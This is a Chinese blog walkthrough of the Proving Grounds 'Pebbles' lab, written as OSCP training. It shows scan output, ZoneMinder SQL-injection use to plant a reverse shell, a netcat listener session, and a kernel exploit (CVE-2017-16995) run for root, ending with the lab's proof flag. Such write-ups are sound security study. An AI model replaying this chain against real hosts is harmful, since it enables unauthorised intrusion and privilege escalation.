OSCP - Proving Grounds - Pebbles

柴郡猫^O^

于 2024-10-07 13:11:24 发布

阅读量299

点赞数 6

分类专栏： OSCP 文章标签：网络安全安全性测试

本文链接：https://blog.csdn.net/N61320/article/details/142732721

版权

OSCP 专栏收录该内容

8 篇文章 0 订阅

订阅专栏

主要知识点

CVE-2019-1010268漏洞利用
sql注入生成reverse shell

具体步骤

执行nmap扫描，很多端口开放，挨个看一下三个http端口

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-10 23:54 UTC
Nmap scan report for 192.168.51.52
Host is up (0.00060s latency).
Not shown: 65530 filtered tcp ports (no-response)
PORT     STATE SERVICE VERSION
21/tcp   open  ftp     vsftpd 3.0.3
22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 aa:cf:5a:93:47:18:0e:7f:3d:6d:a5:af:f8:6a:a5:1e (RSA)
|   256 c7:63:6c:8a:b5:a7:6f:05:bf:d0:e3:90:b5:b8:96:58 (ECDSA)
|_  256 93:b2:6a:11:63:86:1b:5e:f5:89:58:52:89:7f:f3:42 (ED25519)
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Pebbles
|_http-server-header: Apache/2.4.18 (Ubuntu)
3305/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
8080/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-favicon: Apache Tomcat
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Tomcat

执行nikto扫描三个http端口，都比较类似，有zm目录

- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP:          192.168.51.52
+ Target Hostname:    192.168.51.52
+ Target Port:        3305
+ Start Time:         2024-07-11 00:02:54 (GMT0)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ /: Server may leak inodes via ETags, header found with file /, inode: 2c39, size: 5a8af141fc0fe, mtime: gzip. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418
+ OPTIONS: Allowed HTTP Methods: GET, HEAD, POST, OPTIONS .
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ /zm/: Cookie ZMSESSID created without the httponly flag. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies
+ /zm/: Cookie zmSkin created without the httponly flag. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies
+ /zm/: Cookie zmCSS created without the httponly flag. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies
+ /zm/: This might be interesting: potential country code (Zambia).
+ 8909 requests: 0 error(s) and 10 item(s) reported on remote host
+ End Time:           2024-07-11 00:03:07 (GMT0) (13 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

访问任意一个端口得到zoneminder v1.29.0安装

搜索得到其有sql注入等多个漏洞，尝试利用sql注入生成reverse shell,参考ZoneMinder (1.29,1.30) Exploitation (Multiple Vulnerabilities) | VK9 Security

打开burpsuite，利用proxy访问 zoneminder,访问使用如下参数访问 ../zm/index.php

在本地调用nc -nlvp 80后，再访问 shell5.php，reverse shell创建成功

C:\home\kali\Documents\OFFSEC\WarmUp\Pebbles_Pending\CVE-2023-26035-main> nc -nlvp 80
listening on [any] 80 ...
connect to [192.168.45.216] from (UNKNOWN) [192.168.116.52] 53828
bash: cannot set terminal process group (1280): Inappropriate ioctl for device
bash: no job control in this shell
www-data@pebbles:/var/www/html$

尝试寻找suid或者具备suid capability的可执行文件，均失败，于是上传linpeas.sh，得到有趣的东西,linux版本为4.4.0-21-generic,应该有内核漏洞

......
......
Linux version 4.4.0-21-generic (buildd@lgw01-21) (gcc version 5.3.1 20160413 (Ubuntu 5.3.1-14ubuntu2) ) #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016  
......
......
[+] [CVE-2017-16995] eBPF_verifier

   Details: https://ricklarabee.blogspot.com/2018/07/ebpf-and-analysis-of-get-rekt-linux.html
   Exposure: highly probable
   Tags: debian=9.0{kernel:4.9.0-3-amd64},fedora=25|26|27,ubuntu=14.04{kernel:4.4.0-89-generic},[ ubuntu=(16.04|17.04) ]{kernel:4.(8|10).0-(19|28|45)-generic}
   Download URL: https://www.exploit-db.com/download/45010
   Comments: CONFIG_BPF_SYSCALL needs to be set && kernel.unprivileged_bpf_disabled != 1

下载45010号漏洞并编译后，上传至remote server，执行得到root权限

www-data@pebbles:/tmp$ chmod +x cve-2017-16995
chmod +x cve-2017-16995
www-data@pebbles:/tmp$ ./cve-2017-16995
./cve-2017-16995
id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
cat /root/proof.txt
40e59a0df2f1be0a73cfba170ac26ad9